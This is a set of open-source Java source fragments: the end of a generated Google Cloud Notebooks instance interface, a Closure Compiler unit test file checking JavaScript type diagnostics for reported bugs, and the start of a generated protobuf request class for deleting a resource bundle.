.google.cloud.notebooks.v1.ReservationAffinity reservation_affinity = 34 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the reservationAffinity field is set. */ boolean hasReservationAffinity(); /** * * * <pre> * Optional. The optional reservation affinity. Setting this field will apply * the specified [Zonal Compute * Reservation](https://cloud.google.com/compute/docs/instances/reserving-zonal-resources) * to this notebook instance. * </pre> * * <code> * .google.cloud.notebooks.v1.ReservationAffinity reservation_affinity = 34 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The reservationAffinity. */ com.google.cloud.notebooks.v1.ReservationAffinity getReservationAffinity(); /** * * * <pre> * Optional. The optional reservation affinity. Setting this field will apply * the specified [Zonal Compute * Reservation](https://cloud.google.com/compute/docs/instances/reserving-zonal-resources) * to this notebook instance. * </pre> * * <code> * .google.cloud.notebooks.v1.ReservationAffinity reservation_affinity = 34 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ com.google.cloud.notebooks.v1.ReservationAffinityOrBuilder getReservationAffinityOrBuilder(); /** * * * <pre> * Output only. Email address of entity that sent original CreateInstance request. * </pre> * * <code>string creator = 36 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The creator. */ java.lang.String getCreator(); /** * * * <pre> * Output only. Email address of entity that sent original CreateInstance request. * </pre> * * <code>string creator = 36 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The bytes for creator. */ com.google.protobuf.ByteString getCreatorBytes(); /** * * * <pre> * Optional. Flag to enable ip forwarding or not, default false/off. * https://cloud.google.com/vpc/docs/using-routes#canipforward * </pre> * * <code>bool can_ip_forward = 39 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The canIpForward. */ boolean getCanIpForward(); /** * * * <pre> * Output only. Instance creation time. * </pre> * * <code>.google.protobuf.Timestamp create_time = 23 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return Whether the createTime field is set. */ boolean hasCreateTime(); /** * * * <pre> * Output only. Instance creation time. * </pre> * * <code>.google.protobuf.Timestamp create_time = 23 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The createTime. */ com.google.protobuf.Timestamp getCreateTime(); /** * * * <pre> * Output only. Instance creation time. * </pre> * * <code>.google.protobuf.Timestamp create_time = 23 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.protobuf.TimestampOrBuilder getCreateTimeOrBuilder(); /** * * * <pre> * Output only. Instance update time. * </pre> * * <code>.google.protobuf.Timestamp update_time = 24 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return Whether the updateTime field is set. */ boolean hasUpdateTime(); /** * * * <pre> * Output only. Instance update time. * </pre> * * <code>.google.protobuf.Timestamp update_time = 24 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The updateTime. */ com.google.protobuf.Timestamp getUpdateTime(); /** * * * <pre> * Output only. Instance update time. * </pre> * * <code>.google.protobuf.Timestamp update_time = 24 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.protobuf.TimestampOrBuilder getUpdateTimeOrBuilder(); com.google.cloud.notebooks.v1.Instance.EnvironmentCase getEnvironmentCase(); }
google/closure-compiler
35,032
test/com/google/javascript/jscomp/TypeCheckBugsAndIssuesTest.java
/* * Copyright 2006 The Closure Compiler Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.javascript.jscomp; import static com.google.javascript.jscomp.TypeCheck.POSSIBLE_INEXISTENT_PROPERTY_EXPLANATION; import static com.google.javascript.jscomp.TypeCheckTestCase.TypeTestBuilder.newTest; import com.google.javascript.jscomp.testing.TestExternsBuilder; import org.junit.Test; import org.junit.runner.RunWith; import org.junit.runners.JUnit4; /** Tests {@link TypeCheck}. */ @RunWith(JUnit4.class) public final class TypeCheckBugsAndIssuesTest { @Test public void testIssue61a() { newTest() .addSource( """ var ns = {}; (function() { /** @param {string} b */ ns.a = function(b) {}; })(); function d() { ns.a(123); } """) .addDiagnostic( """ actual parameter 1 of ns.a does not match formal parameter found : number required: string """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testIssue61b() { newTest() .addSource( """ /** @const */ var ns = {}; (function() { /** @param {string} b */ ns.a = function(b) {}; })(); ns.a(123); """) .addDiagnostic( """ actual parameter 1 of ns.a does not match formal parameter found : number required: string """) .run(); } @Test public void testIssue61c() { newTest() .addSource( """ var ns = {}; (function() { /** @param {string} b */ ns.a = function(b) {}; })(); ns.a(123); """) .addDiagnostic( """ actual parameter 1 of ns.a does not match formal parameter found : number required: string """) .run(); } @Test public void testIssue86() { newTest() .addSource( """ /** @interface */ function I() {} /** @return {number} */ I.prototype.get = function(){}; /** @constructor\s * @implements {I} */ function F() {} /** @override */ F.prototype.get = function() { return true; }; """) .addDiagnostic( """ inconsistent return type found : boolean required: number """) .run(); } @Test public void testIssue124() { newTest() .addSource( """ var t = null; function test() { if (t != null) { t = null; } t = 1; } """) .run(); } @Test public void testIssue124b() { newTest() .addSource( """ var t = null; function test() { if (t != null) { t = null; } t = undefined; } """) .addDiagnostic( """ condition always evaluates to false left : (null|undefined) right: null """) .run(); } @Test public void testIssue259() { newTest() .addSource( """ /** @param {number} x */ function f(x) {} /** @constructor */ var Clock = function() { /** @constructor */ this.Date = function() {}; f(new this.Date()); }; """) .addDiagnostic( """ actual parameter 1 of f does not match formal parameter found : this.Date required: number """) .run(); } @Test public void testIssue301() { newTest() .addExterns(new TestExternsBuilder().addString().addArray().build()) .addSource( """ Array.indexOf = function() {}; var s = 'hello'; alert(s.toLowerCase.indexOf('1')); """) .addDiagnostic("Property indexOf never defined on String.prototype.toLowerCase") .run(); } @Test public void testIssue368() { newTest() .addSource( """ /** @constructor */ function Foo(){} /** * @param {number} one * @param {string} two */ Foo.prototype.add = function(one, two) {}; /** * @constructor * @extends {Foo} */ function Bar(){} /** @override */ Bar.prototype.add = function(ignored) {}; (new Bar()).add(1, 2); """) .addDiagnostic( """ actual parameter 2 of Bar.prototype.add does not match formal parameter found : number required: string """) .run(); } @Test public void testIssue380() { newTest() .addExterns(new TestExternsBuilder().addArray().addObject().build()) .addSource( """ /** @type { function(string): {innerHTML: string} } */ document.getElementById; var list = /** @type {!Array<string>} */ ['hello', 'you']; list.push('?'); document.getElementById('node').innerHTML = list.toString(); """) .run(); } @Test public void testIssue483() { newTest() .addExterns(new TestExternsBuilder().addArray().build()) .addSource( """ /** @constructor */ function C() { /** @type {?Array} */ this.a = []; } C.prototype.f = function() { if (this.a.length > 0) { g(this.a); } }; /** @param {number} a */ function g(a) {} """) .addDiagnostic( """ actual parameter 1 of g does not match formal parameter found : Array required: number """) .run(); } @Test public void testIssue537a() { newTest() .addSource( """ /** @constructor */ function Foo() {} Foo.prototype = {method: function() {}}; /** * @constructor * @extends {Foo} */ function Bar() { Foo.call(this); if (this.baz()) this.method(1); } Bar.prototype = { baz: function() { return true; } }; Bar.prototype.__proto__ = Foo.prototype; """) .addDiagnostic( """ Function Foo.prototype.method: called with 1 argument(s). \ Function requires at least 0 argument(s) and no more than 0 argument(s). """) .includeDefaultExterns() .run(); } @Test public void testIssue537b() { newTest() .addSource( """ /** @constructor */ function Foo() {} Foo.prototype = {method: function() {}}; /** * @constructor * @extends {Foo} */ function Bar() { Foo.call(this); if (this.baz(1)) this.method(); } Bar.prototype = { baz: function() { return true; } }; Bar.prototype.__proto__ = Foo.prototype; """) .addDiagnostic( """ Function Bar.prototype.baz: called with 1 argument(s). \ Function requires at least 0 argument(s) and no more than 0 argument(s). """) .includeDefaultExterns() .run(); } @Test public void testIssue537c() { newTest() .addSource( """ /** @constructor */ function Foo() {} /** * @constructor * @extends {Foo} */ function Bar() { Foo.call(this); if (this.baz2()) alert(1); } Bar.prototype = { baz: function() { return true; } }; Bar.prototype.__proto__ = Foo.prototype; """) .addDiagnostic("Property baz2 never defined on Bar") .includeDefaultExterns() .run(); } @Test public void testIssue537d() { newTest() .addSource( """ /** @constructor */ function Foo() {} Foo.prototype = { /** @return {Bar} */ x: function() { new Bar(); }, /** @return {Foo} */ y: function() { new Bar(); } }; /** * @constructor * @extends {Foo} */ function Bar() { this.xy = 3; } /** @return {Bar} */ function f() { return new Bar(); } /** @return {Foo} */ function g() { return new Bar(); } Bar.prototype = { /** @override @return {Bar} */ x: function() { new Bar(); }, /** @override @return {Foo} */ y: function() { new Bar(); } }; Bar.prototype.__proto__ = Foo.prototype; """) .includeDefaultExterns() .run(); } @Test public void testIssue586() { newTest() .addSource( """ /** @constructor */ var MyClass = function() {}; /** @param {boolean} success */ MyClass.prototype.fn = function(success) {}; MyClass.prototype.test = function() { this.fn(); this.fn = function() {}; }; """) .addDiagnostic( """ Function MyClass.prototype.fn: called with 0 argument(s). \ Function requires at least 1 argument(s) and no more than 1 argument(s). """) .run(); } @Test public void testIssue635() { // TODO(nicksantos): Make this emit a warning, because of the 'this' type. newTest() .addSource( """ /** @constructor */ function F() {} F.prototype.bar = function() { this.baz(); }; F.prototype.baz = function() {}; /** @constructor */ function G() {} G.prototype.bar = F.prototype.bar; """) .run(); } @Test public void testIssue635b() { newTest() .addSource( """ /** @constructor */ function F() {} /** @constructor */ function G() {} /** @type {function(new:G)} */ var x = F; """) .addDiagnostic( """ initializing variable found : (typeof F) required: function(new:G): ? """) .run(); } @Test public void testIssue669() { newTest() .addSource( """ /** @return {{prop1: (Object|undefined)}} */ function f(a) { var results; if (a) { results = {}; results.prop1 = {a: 3}; } else { results = {prop2: 3}; } return results; } """) .run(); } @Test public void testIssue688() { newTest() .addSource( """ /** @const */ var SOME_DEFAULT = /** @type {TwoNumbers} */ ({first: 1, second: 2}); /** * Class defining an interface with two numbers. * @interface */ function TwoNumbers() {} /** @type {number} */ TwoNumbers.prototype.first; /** @type {number} */ TwoNumbers.prototype.second; /** @return {number} */ function f() { return SOME_DEFAULT; } """) .addDiagnostic( """ inconsistent return type found : (TwoNumbers|null) required: number """) .run(); } @Test public void testIssue700() { newTest() .addSource( """ /** * @param {{text: string}} opt_data * @return {string} */ function temp1(opt_data) { return opt_data.text; } /** * @param {{activity: (boolean|number|string|null|Object)}} opt_data * @return {string} */ function temp2(opt_data) { /** @suppress {checkTypes} */ function __inner() { return temp1(opt_data.activity); } return __inner(); } /** * @param {{n: number, text: string, b: boolean}} opt_data * @return {string} */ function temp3(opt_data) { return 'n: ' + opt_data.n + ', t: ' + opt_data.text + '.'; } function callee() { var output = temp3({ n: 0, text: 'a string', b: true }) alert(output); } callee(); """) .run(); } @Test public void testIssue725() { newTest() .addSource( """ /** @typedef {{name: string}} */ var RecordType1; /** @typedef {{name2222: string}} */ var RecordType2; /** @param {RecordType1} rec */ function f(rec) { alert(rec.name2222); } """) .addDiagnostic("Property name2222 never defined on rec") .run(); } @Test public void testIssue726() { newTest() .addSource( """ /** @constructor */ function Foo() {} /** @param {number} x */ Foo.prototype.bar = function(x) {}; /** @return {!Function} */ Foo.prototype.getDeferredBar = function() { var self = this; return function() { self.bar(true); }; }; """) .addDiagnostic( """ actual parameter 1 of Foo.prototype.bar does not match formal parameter found : boolean required: number """) .run(); } @Test public void testIssue765() { newTest() .addSource( """ /** @constructor */ var AnotherType = function(parent) { /** @param {string} stringParameter Description... */ this.doSomething = function(stringParameter) {}; }; /** @constructor */ var YetAnotherType = function() { this.field = new AnotherType(self); this.testfun=function(stringdata) { this.field.doSomething(null); }; }; """) .addDiagnostic( """ actual parameter 1 of AnotherType.doSomething does not match formal parameter found : null required: string """) .run(); } @Test public void testIssue783() { newTest() .addSource( """ /** @constructor */ var Type = function() { /** @type {Type} */ this.me_ = this; }; Type.prototype.doIt = function() { var me = this.me_; for (var i = 0; i < me.unknownProp; i++) {} }; """) .addDiagnostic("Property unknownProp never defined on Type") .run(); } @Test public void testIssue791() { newTest() .addSource( """ /** @param {{func: function()}} obj */ function test1(obj) {} var fnStruc1 = {}; fnStruc1.func = function() {}; test1(fnStruc1); """) .run(); } @Test public void testIssue810() { newTest() .addSource( """ /** @constructor */ var Type = function() { this.prop = x; }; Type.prototype.doIt = function(obj) { this.prop = obj.unknownProp; }; """) .addDiagnostic( "Property unknownProp never defined on obj" + POSSIBLE_INEXISTENT_PROPERTY_EXPLANATION) .run(); } @Test public void testIssue1002() { newTest() .addSource( """ /** @interface */ var I = function() {}; /** @constructor @implements {I} */ var A = function() {}; /** @constructor @implements {I} */ var B = function() {}; var f = function() { if (A === B) { new B(); } }; """) .run(); } @Test public void testIssue1023() { newTest() .addSource( """ /** @constructor */ function F() {} (function() { F.prototype = { /** @param {string} x */ bar: function(x) { } }; })(); (new F()).bar(true) """) .addDiagnostic( """ actual parameter 1 of F.prototype.bar does not match formal parameter found : boolean required: string """) .run(); } @Test public void testIssue1047() { newTest() .addSource( """ /** * @constructor */ function C2() {} /** * @constructor */ function C3(c2) { /** * @type {C2}\s * @private */ this.c2_; var x = this.c2_.prop; } """) .addDiagnostic("Property prop never defined on C2") .run(); } @Test public void testIssue1056() { newTest() .addSource( """ /** @type {Array} */ var x = null; x.push('hi'); """) .addDiagnostic( """ No properties on this expression found : null required: Object """) .run(); } @Test public void testIssue1072() { newTest() .addSource( """ /** * @param {string} x * @return {number} */ var f1 = function(x) { return 3; }; /** Function */ var f2 = function(x) { if (!x) throw new Error() return /** @type {number} */ (f1('x')) } /** * @param {string} x */ var f3 = function(x) {}; f1(f3); """) .addDiagnostic( """ actual parameter 1 of f1 does not match formal parameter found : function(string): undefined required: string """) .run(); } @Test public void testIssue1123() { newTest() .addSource( """ /** @param {function(number)} g */ function f(g) {} f(function(a, b) {}) """) .addDiagnostic( """ actual parameter 1 of f does not match formal parameter found : function(?, ?): undefined required: function(number): ? """) .run(); } @Test public void testIssue1201() { newTest() .addSource( """ /** @param {function(this:void)} f */ function g(f) {} /** @constructor */ function F() {} /** desc */ F.prototype.bar = function() {}; g(new F().bar); """) .addDiagnostic( """ actual parameter 1 of g does not match formal parameter found : function(this:F): undefined required: function(this:undefined): ? """) .run(); } @Test public void testIssue1201b() { newTest() .addSource( """ /** @param {function(this:void)} f */ function g(f) {} /** @constructor */ function F() {} /** desc */ F.prototype.bar = function() {}; var f = new F(); g(f.bar.bind(f)); """) .includeDefaultExterns() .run(); } @Test public void testIssue1201c() { newTest() .addSource( """ /** @param {function(this:void)} f */ function g(f) {} g(function() { this.alert() }) """) .addDiagnostic( """ No properties on this expression found : undefined required: Object """) .run(); } @Test public void testIssue926a() { newTest() .addSource( """ /** x */ function error() {} /** * @constructor * @param {string} error */ function C(error) { /** @const */ this.e = error; } /** @type {number} */ var x = (new C('x')).e; """) .addDiagnostic( """ initializing variable found : string required: number """) .run(); } @Test public void testIssue926b() { newTest() .addSource( """ /** @constructor */ function A() { /** @constructor */ function B() {} /** @type {!B} */ this.foo = new B(); /** @type {!B} */ var C = new B(); } /** @type {number} */ var x = (new A()).foo; """) .addDiagnostic( """ initializing variable found : B required: number """) .run(); } /** * Tests that the || operator is type checked correctly, that is of the type of the first argument * or of the second argument. See bugid 592170 for more details. */ @Test public void testBug592170() { newTest() .addSource( """ /** @param {Function} opt_f ... */ function foo(opt_f) { /** @type {Function} */ return opt_f || function() {}; } """) .run(); } @Test public void testNullishCoalesceTypeIsFirstOrSecondArgument() { newTest() .addSource( """ /** @param {Function} opt_f ... */ function foo(opt_f) { /** @type {Function} */ return opt_f ?? function() {}; } """) .run(); } /** * Tests that undefined can be compared shallowly to a value of type (number,undefined) regardless * of the side on which the undefined value is. */ @Test public void testBug901455a() { newTest() .addSource( """ /** @return {(number|undefined)} */ function a() { return 3; } var b = undefined === a() """) .run(); } /** * Tests that undefined can be compared shallowly to a value of type (number,undefined) regardless * of the side on which the undefined value is. */ @Test public void testBug901455b() { newTest() .addSource( """ /** @return {(number|undefined)} */ function a() { return 3; } var b = a() === undefined """) .run(); } /** Tests that the match method of strings returns nullable arrays. */ @Test public void testBug908701() { newTest() .addExterns(new TestExternsBuilder().addString().build()) .addSource( """ /** @type {String} */ var s = new String('foo'); var b = s.match(/a/) != null; """) .run(); } /** Tests that named types play nicely with subtyping. */ @Test public void testBug908625() { newTest() .addSource( """ /** @constructor */function A(){} /** @constructor * @extends A */function B(){} /** @param {B} b @return {(A|undefined)} */function foo(b){return b} """) .run(); } /** * Tests that assigning two untyped functions to a variable whose type is inferred and calling * this variable is legal. */ @Test public void testBug911118a() { // verifying the type assigned to function expressions assigned variables newTest() .addSource("var a = function() {}; /** @type {!null} */ const b = a;") .addDiagnostic( """ initializing variable found : function(): undefined required: None """) .run(); } /** * Tests that assigning two untyped functions to a variable whose type is inferred and calling * this variable is legal. */ @Test public void testBug911118b() { // verifying the bug example newTest() .addSource( """ function nullFunction() {}; var foo = nullFunction; foo = function() {}; foo(); """) .run(); } @Test public void testBug909000() { newTest() .addSource( """ /** @constructor */function A(){} /** @param {!A} a @return {boolean}*/ function y(a) { return a } """) .addDiagnostic( """ inconsistent return type found : A required: boolean """) .run(); } @Test public void testBug930117() { newTest() .addSource( """ /** @param {boolean} x */function f(x){} f(null); """) .addDiagnostic( """ actual parameter 1 of f does not match formal parameter found : null required: boolean """) .run(); } @Test public void testBug1484445() { newTest() .addSource( """ /** @constructor */ function Foo() {} /** @type {number?} */ Foo.prototype.bar = null; /** @type {number?} */ Foo.prototype.baz = null; /** @param {Foo} foo */ function f(foo) { while (true) { if (foo.bar == null && foo.baz == null) { foo.bar; } } } """) .run(); } @Test public void testBug1859535() { newTest() .addSource( """ /** * @param {Function} childCtor Child class. * @param {Function} parentCtor Parent class. */ var inherits = function(childCtor, parentCtor) { /** @constructor */ function tempCtor() {}; tempCtor.prototype = parentCtor.prototype; childCtor.superClass_ = parentCtor.prototype; childCtor.prototype = new tempCtor(); /** @override */ childCtor.prototype.constructor = childCtor; }; /** * @param {Function} constructor * @param {Object} var_args * @return {Object} */ var factory = function(constructor, var_args) { /** @constructor */ var tempCtor = function() {}; tempCtor.prototype = constructor.prototype; var obj = new tempCtor(); constructor.apply(obj, arguments); return obj; }; """) .includeDefaultExterns() .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug1940591() { newTest() .addSource( """ /** @type {Object} */ var a = {}; /** @type {number} */ a.name = 0; /** * @param {Function} x anything. */ a.g = function(x) { x.name = 'a'; } """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug1942972() { newTest() .addSource( """ var google = { gears: { factory: {}, workerPool: {} } }; google.gears = {factory: {}}; """) .run(); } @Test public void testBug1943776() { newTest() .addSource( """ /** @return {{foo: Array}} */ function bar() { return {foo: []}; } """) .run(); } @Test public void testBug1987544() { newTest() .addSource( """ /** @param {string} x */ function foo(x) {} var duration; if (true && !(duration = 3)) { foo(duration); } """) .addDiagnostic( """ actual parameter 1 of foo does not match formal parameter found : number required: string """) .run(); } @Test public void testBug1940769() { newTest() .addSource( """ /** @return {!Object} */ function proto(obj) { return obj.prototype; } /** * @constructor * @extends {Map} */ function Map2() { Map.call(this); }; Map2.prototype = proto(Map); """) .addExterns(new TestExternsBuilder().addMap().addObject().build()) .run(); } @Test public void testBug2335992() { newTest() .addSource( """ /** @return {*} */ function f() { return 3; } var x = f(); /** @type {string} */ x.y = 3; """) .addDiagnostic( """ assignment found : number required: string """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug2341812() { newTest() .addSource( """ /** @interface */ function EventTarget() {} /** @constructor\s * @implements {EventTarget} */ function Node() {} /** @type {number} */ Node.prototype.index; /** @param {EventTarget} x\s * @return {string} */ function foo(x) { return x.index; } """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug7701884() { newTest() .addExterns(new TestExternsBuilder().addArray().build()) .addSource( """ /** * @param {Array<T>} x * @param {function(T)} y * @template T */ var forEach = function(x, y) { for (var i = 0; i < x.length; i++) y(x[i]); }; /** @param {number} x */ function f(x) {} /** @param {?} x */ function h(x) { var top = null; forEach(x, function(z) { top = z; }); if (top) f(top); } """) .run(); } @Test public void testBug8017789() { newTest() .addSource( """ /** @param {(map|function())} isResult */ var f = function(isResult) { while (true) isResult['t']; }; /** @typedef {Object<string, number>} */ var map; """) .run(); } @Test public void testBug12441160() { newTest() .addSource( """ /** @param {string} a */\s function use(a) {}; /** * @param {function(this:THIS)} fn * @param {THIS} context\s * @constructor * @template THIS */ var P = function(fn, context) {} /** @constructor */ function C() { /** @type {number} */ this.a = 1; } /** @return {P} */\s C.prototype.method = function() { return new P(function() { use(this.a); }, this); }; """) .addDiagnostic( """ actual parameter 1 of use does not match formal parameter found : number required: string """) .run(); } @Test public void testBug13641083a() { newTest() .addSource( """ /** @constructor @struct */ function C() {}; new C().bar; """) .addDiagnostic(TypeCheck.INEXISTENT_PROPERTY) .run(); } @Test public void testBug13641083b() { newTest() .addSource( """ /** @type {?} */ var C; C.bar + 1; """) .addDiagnostic(TypeCheck.POSSIBLE_INEXISTENT_PROPERTY) .run(); } @Test public void testBug12722936() { // Verify we don't use a weaker type when a // stronger type is known for a slot. newTest() .addSource( """ /** * @constructor * @template T */ function X() {} /** @constructor */ function C() { /** @type {!X<boolean>}*/ this.a = new X(); /** @type {null} */ var x = this.a; }; """) .addDiagnostic( """ initializing variable found : X<boolean> required: null """) .run(); } }
googleapis/google-cloud-java
35,799
java-configdelivery/proto-google-cloud-configdelivery-v1beta/src/main/java/com/google/cloud/configdelivery/v1beta/DeleteResourceBundleRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/configdelivery/v1beta/config_delivery.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.configdelivery.v1beta; /** * * * <pre> * Message for deleting a ResourceBundle * </pre> * * Protobuf type {@code google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest} */ public final class DeleteResourceBundleRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) DeleteResourceBundleRequestOrBuilder { private static final long serialVersionUID = 0L; // Use DeleteResourceBundleRequest.newBuilder() to construct. private DeleteResourceBundleRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private DeleteResourceBundleRequest() { name_ = ""; requestId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new DeleteResourceBundleRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.class, com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.Builder.class); } public static final int NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ @java.lang.Override public java.lang.String getName() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ @java.lang.Override public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int REQUEST_ID_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The requestId. */ @java.lang.Override public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The bytes for requestId. */ @java.lang.Override public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int FORCE_FIELD_NUMBER = 3; private boolean force_ = false; /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The force. */ @java.lang.Override public boolean getForce() { return force_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, requestId_); } if (force_ != false) { output.writeBool(3, force_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, requestId_); } if (force_ != false) { size += com.google.protobuf.CodedOutputStream.computeBoolSize(3, force_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest)) { return super.equals(obj); } com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest other = (com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) obj; if (!getName().equals(other.getName())) return false; if (!getRequestId().equals(other.getRequestId())) return false; if (getForce() != other.getForce()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + NAME_FIELD_NUMBER; hash = (53 * hash) + getName().hashCode(); hash = (37 * hash) + REQUEST_ID_FIELD_NUMBER; hash = (53 * hash) + getRequestId().hashCode(); hash = (37 * hash) + FORCE_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(getForce()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.ByteString data) throws 